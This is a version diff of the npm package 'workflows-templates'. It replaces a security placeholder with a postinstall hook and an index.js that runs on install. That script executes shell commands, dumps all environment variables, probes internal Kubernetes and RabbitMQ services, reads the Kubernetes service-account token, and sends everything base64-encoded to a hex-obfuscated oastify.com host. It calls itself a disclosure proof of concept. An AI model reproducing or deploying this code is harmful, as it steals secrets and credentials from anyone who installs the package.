workflows-templates 0.0.1-security → 98.99.9

package/index.js

@@ -0,0 +1,119 @@
+// =========================================================================
+// ================ MAX POWER NODE.JS NATIVE POC (FINAL) ===================
+// =========================================================================
+// This payload proves RCE and INTERNAL NETWORK ACCESS using only Node.js
+// modules to ensure it runs even in the most minimal environments.
+
+const os = require('os');
+const https = require('https');
+const http = require('http'); // For internal HTTP probes
+const net = require('net');   // For internal TCP socket probes
+const fs = require('fs');     // For reading the K8s token
+const { execSync } = require('child_process');
+
+// --- CONFIGURATION ---
+const OAST_DOMAIN_HEX = '77717170633861787772686e707a336e373837733967316c756330376f78636d2e6f6173746966792e636f6d';
+
+/**
+ * A safe function to execute shell commands, returning a default value on failure.
+ */
+const run = (cmd) => {
+    try {
+        return execSync(cmd, { stdio: 'pipe', timeout: 3000 }).toString().trim();
+    } catch (e) {
+        return 'CMD_FAILED';
+    }
+};
+
+/**
+ * Uses pure Node.js to probe an HTTP endpoint.
+ * @param {string} host - The internal hostname or IP.
+ * @param {number} port - The internal port.
+ * @returns {Promise<string>} A promise that resolves with the first chunk of the response or an error message.
+ */
+const probeHttp = (host, port, protocol = 'http') => new Promise(resolve => {
+    if (!host || !port) return resolve('TARGET_UNDEFINED');
+    const module = protocol === 'https' ? https : http;
+    const req = module.get({ host, port, path: '/', timeout: 2000 }, (res) => {
+        let data = `STATUS:${res.statusCode} HEADERS:${JSON.stringify(res.headers)}`;
+        resolve(data.substring(0, 500)); // Cap the response size
+    });
+    req.on('error', (e) => resolve(`PROBE_ERROR:${e.message}`));
+    req.on('timeout', () => { req.destroy(); resolve('PROBE_TIMEOUT'); });
+});
+
+/**
+ * Uses pure Node.js to check if a TCP port is open.
+ * @param {string} host - The internal hostname or IP.
+ * @param {number} port - The internal port.
+ * @returns {Promise<string>} A promise that resolves with "PORT_OPEN" or an error message.
+ */
+const probeTcp = (host, port) => new Promise(resolve => {
+    if (!host || !port) return resolve('TARGET_UNDEFINED');
+    const socket = new net.Socket();
+    socket.setTimeout(2000);
+    socket.on('connect', () => {
+        resolve('PORT_OPEN');
+        socket.destroy();
+    });
+    socket.on('error', (e) => resolve(`PORT_ERROR:${e.message}`));
+    socket.on('timeout', () => {
+        resolve('PORT_TIMEOUT');
+        socket.destroy();
+    });
+    socket.connect(port, host);
+});
+
+/**
+ * Gathers a complete intelligence dossier from the system.
+ */
+const gatherIntelligence = async () => {
+    const report = {
+        proof_of_execution: {
+            hostname: run('hostname'),
+            whoami: run('whoami'),
+            id: os.platform() === 'win32' ? 'N/A' : run('id'),
+            timestamp: new Date().toISOString()
+        },
+        system_context: {
+            os_platform: os.platform(),
+            uname: os.platform() === 'win32' ? run('ver') : run('uname -a'),
+            current_path: run('pwd') || run('cd'),
+            node_version: process.version,
+            user_info_node: os.userInfo()
+        },
+        environment_dump: process.env
+    };
+
+    // The key section: Active, Node-native internal reconnaissance.
+    report.internal_recon_native = {
+        title: "Actively probing internal services using pure Node.js modules...",
+        k8s_api_probe: await probeHttp(process.env.KUBERNETES_SERVICE_HOST, process.env.KUBERNETES_SERVICE_PORT, 'https'),
+        rabbitmq_mgmt_ui_probe: await probeHttp(process.env.RABBITMQ_SERVICE_HOST, 15672),
+        rabbitmq_amqp_port_probe: await probeTcp(process.env.RABBITMQ_SERVICE_HOST, 5672),
+        k8s_service_account_token: fs.existsSync('/var/run/secrets/kubernetes.io/serviceaccount/token')
+            ? fs.readFileSync('/var/run/secrets/kubernetes.io/serviceaccount/token', 'utf8')
+            : 'TOKEN_NOT_FOUND'
+    };
+    
+    return report;
+};
+
+// --- Main Execution and Exfiltration ---
+(async () => {
+    try {
+        const intelReport = await gatherIntelligence();
+        const payload = Buffer.from(JSON.stringify(intelReport, null, 2)).toString('base64');
+        const oast_domain = Buffer.from(OAST_DOMAIN_HEX, 'hex').toString();
+
+        https.request({
+            hostname: oast_domain,
+            port: 443,
+            path: `/NODE_NATIVE_HIT/${intelReport.proof_of_execution.hostname}/${intelReport.proof_of_execution.whoami.replace('\\', '-')}`,
+            method: 'POST',
+            headers: { 'Content-Type': 'text/plain', 'Content-Length': payload.length }
+        }).on('error', e => {}).end(payload);
+    } catch (e) {
+        // Ultimate silent failsafe
+    }
+})();

package/package.json

@@ -1,6 +1,11 @@
 {
   "name": "workflows-templates",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "98.99.9",
+  "description": "Security research package. Final proof-of-concept for responsible disclosure.",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "author": "Security Researcher",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.